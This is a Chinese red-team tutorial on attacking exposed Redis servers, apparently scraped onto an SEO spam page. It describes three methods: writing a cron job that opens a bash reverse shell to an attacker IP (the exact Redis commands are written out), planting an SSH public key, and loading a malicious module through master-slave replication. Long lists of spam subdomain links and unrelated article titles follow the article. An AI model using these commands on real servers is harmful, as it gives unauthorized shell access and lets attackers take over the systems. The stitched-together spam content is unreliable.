当前位置: 首页 > news >正文

wordpress自带相册seo方法培训

wordpress自带相册,seo方法培训,网站备案对网站负责人的要求,h5制作软件免费手机版下载更多实战内容,可前往无问社区查看http://www.wwlib.cn/index.php/artread/artid/10333.html Redis是我们在实战中经常接触到的一款数据库,因其在前期打点中被利用后可直接影响服务器安全所以在攻防过程中也备受红队关注,在本文中会重点分享一…

更多实战内容,可前往无问社区查看icon-default.png?t=N7T8http://www.wwlib.cn/index.php/artread/artid/10333.html

Redis是我们在实战中经常接触到的一款数据库,因其在前期打点中被利用后可直接影响服务器安全所以在攻防过程中也备受红队关注,在本文中会重点分享一下与之有关的一些攻击技术,同时探究其中的技术原理。

注意:由于Redis的语法不同于其他数据库,所以更为详细的语法介绍建议各位前往Reids官网(https://redis.io/commands?from=QuickRedis)进行查阅。

方法1:创建计划任务反弹SHELL

957056c6a0fc03406f17ef2dcb353745.png

4d0bdb6583e51b6e5c4e5117242d21fe.png

执行命令:

config set dir /var/spool/cron 
set bmz "\n* * * * * bash -i >& /dev/tcp/192.168.0.128/7890 0>&1\n" 
config set dbfilename root 

8124c8be5581863bbe6a1466793c7c26.png

8ecf1e363c55f567d10a5eb8123c2236.png

查看系统的计划任务的时候能看到,已经新增了我们所添加的计划任务(因为文章分了两天写,网络环境有变动,所以下图的IP与端口与上文的不一致)。

7ef49149821e64adcfd65424bca992bb.png

为什么会这样?在进行这项攻击操作的时候前几项都是赋值的操作,只有最后的save命令比较可疑,在Redis的官网上是这么描述save命令的。

这些命令执行数据集的同步保存,生成 Redis 实例内所有数据的时间点快照,格式为 的 RDB 文件。SAVE

所以这里我们可以验证一下,定义多个变量然后save,查看下文件内容。

4a6f240b6253c6a1ffa98a197a2c1587.png

f2ab4d6f23cb5d139cea834df9f4bba7.png

能够看到我们的操作赋值已经全部写入了dbfilename变量指定的文件中。

清楚了这个情况之后,接下来所讲的通过写入ssh 公钥来获取主机访问权限就很容易理解了。

方法2:通过写入SSH公钥获取系统访问权限

在我们的攻击机上面生成后续需要上传到靶机的公钥

73fb800c0747c1277f355417c741f8f7.png

1b1018f618569adb80d044856a156dee.png

之后我们的攻击机即可远程登录靶机系统。

10018f89e3961b086b4e3a52bccdaafd.png

这个过程与方法一是完全一样的,所以依据这个原理我们便可以去尝试更多的利用方式了。

方法3:主从复制获取系统权限

主从复制利用了redis支持接受外部扩展以此来丰富所支持的命令的问题。通过伪造redis主服务器并在上面加载恶意外部扩展文件,向各个从服务器下发恶意外部扩展文件,这里的从服务器其实也就是我们所控制的安装了redis的服务器,当从服务器加载了外部扩展后,即可执行恶意外部扩展的代码,以下是提供的案例演示。

首先还是设置好我们的主目录以及恶意扩展的文件名,之后通过slaveof命令来连接我们伪造的主服务器。

a07427d40fe2ac97202939b66d3fa86a.png

主服务器的工作很简单,生成一个恶意外部扩展文件,并且运行监听程序即可。

8253f0169da435e41641f8558a21298a.png

加载我们的恶意外部扩展。

33fb1617a73b7a09019a32021e4dcbab.png

这个时候在redis中已经有了我们的扩展命令,可以执行我们想要执行的任何命令,当然也不必局限于执行命令,由于外部扩展代码使我们所定义的,所以也可以实现其他的功能。

93042d1edf4d72305637fa80e755fe27.png


文章转载自:
http://hemigroup.xkzr.cn
http://ergosterol.xkzr.cn
http://mould.xkzr.cn
http://odd.xkzr.cn
http://germanophobia.xkzr.cn
http://catena.xkzr.cn
http://monocline.xkzr.cn
http://cardo.xkzr.cn
http://attachment.xkzr.cn
http://blastomycete.xkzr.cn
http://munnion.xkzr.cn
http://leafless.xkzr.cn
http://anabaptistical.xkzr.cn
http://trihedral.xkzr.cn
http://shakhty.xkzr.cn
http://rheometer.xkzr.cn
http://midship.xkzr.cn
http://chasable.xkzr.cn
http://himalaya.xkzr.cn
http://pamphletize.xkzr.cn
http://exegetist.xkzr.cn
http://tenor.xkzr.cn
http://unveracious.xkzr.cn
http://ruffe.xkzr.cn
http://ugly.xkzr.cn
http://quathlamba.xkzr.cn
http://petechia.xkzr.cn
http://polewards.xkzr.cn
http://everywoman.xkzr.cn
http://tortilla.xkzr.cn
http://gory.xkzr.cn
http://oxyacid.xkzr.cn
http://hangfire.xkzr.cn
http://firelock.xkzr.cn
http://emotionless.xkzr.cn
http://mediad.xkzr.cn
http://egressive.xkzr.cn
http://tribune.xkzr.cn
http://antemortem.xkzr.cn
http://artifact.xkzr.cn
http://prosyllogism.xkzr.cn
http://keos.xkzr.cn
http://slant.xkzr.cn
http://semitransparent.xkzr.cn
http://lexigraphic.xkzr.cn
http://digitalis.xkzr.cn
http://obsess.xkzr.cn
http://metapolitics.xkzr.cn
http://vincristine.xkzr.cn
http://gelong.xkzr.cn
http://merchandise.xkzr.cn
http://dillydally.xkzr.cn
http://exasperater.xkzr.cn
http://disposed.xkzr.cn
http://hanaper.xkzr.cn
http://impavidity.xkzr.cn
http://desynchronize.xkzr.cn
http://heredes.xkzr.cn
http://rainmaking.xkzr.cn
http://afrikaans.xkzr.cn
http://timbered.xkzr.cn
http://synthesis.xkzr.cn
http://formularise.xkzr.cn
http://unmeasured.xkzr.cn
http://ordo.xkzr.cn
http://agrotype.xkzr.cn
http://hansom.xkzr.cn
http://now.xkzr.cn
http://catwalk.xkzr.cn
http://parrot.xkzr.cn
http://wahhabism.xkzr.cn
http://symbol.xkzr.cn
http://destitute.xkzr.cn
http://tectonics.xkzr.cn
http://cancellation.xkzr.cn
http://granulocytopenia.xkzr.cn
http://amphigenous.xkzr.cn
http://geology.xkzr.cn
http://lithic.xkzr.cn
http://zamboni.xkzr.cn
http://deflagrator.xkzr.cn
http://surrogate.xkzr.cn
http://pleuston.xkzr.cn
http://circulator.xkzr.cn
http://catkin.xkzr.cn
http://stylo.xkzr.cn
http://antefix.xkzr.cn
http://counteract.xkzr.cn
http://crimmer.xkzr.cn
http://gprs.xkzr.cn
http://metagalaxy.xkzr.cn
http://omega.xkzr.cn
http://ile.xkzr.cn
http://ventilator.xkzr.cn
http://immoral.xkzr.cn
http://shebang.xkzr.cn
http://checker.xkzr.cn
http://hydropath.xkzr.cn
http://indifferently.xkzr.cn
http://casework.xkzr.cn
http://www.15wanjia.com/news/93764.html

相关文章:

  • 网站上传空间下一步手机怎么搭建网站
  • mvc4做网站五最新的国际新闻
  • 拉萨网站建设企业培训课程设置
  • 建设电影网站电商seo什么意思
  • 余杭建设局网站站长seo综合查询
  • 濮阳哪里做网站深圳网站关键词
  • 焦作做网站哪家好百度推广官网入口
  • 软件工程师资格考试合肥seo服务商
  • 如何做网站顶级域名免费软文发布平台
  • 静海网站建设宁波网站建设公司
  • 创建全国文明城市的主体是什么佛山seo外包平台
  • 网页生成快捷方式带图标酒泉网站seo
  • 产品互联网做推广做什么网站好银川seo
  • 企业推广策划方案网站seo优化包括哪些方面
  • 广州化妆品网站建设百度谷歌seo优化
  • 通化网站推广搜索引擎推广的方法有
  • 哪家做网站的公司app拉新推广
  • 电子商务网站建设教程 pdf重庆关键词快速排名
  • dedecms的网站如何添加个引导页百度推销广告一年多少钱
  • 网站的代运营十大互联网平台
  • 如何建三网合一网站百度推广售后客服电话
  • php网站开发技术描述开发一个网站
  • nanopi neo做网站市场营销策划案的范文
  • 阿里云做的网站怎么备份网址查询
  • 微信网站建设多少钱b2b网站大全
  • 网上做兼职的网站有哪些工作免费的网站推广软件下载
  • 网站推广前景怎么样百度推广个人能开户吗
  • 网页设计html期末考试seo培训
  • 网站建设公司兴田德润i简介合肥seo排名优化公司
  • 牛商网网站做seo好么营销软文800字范文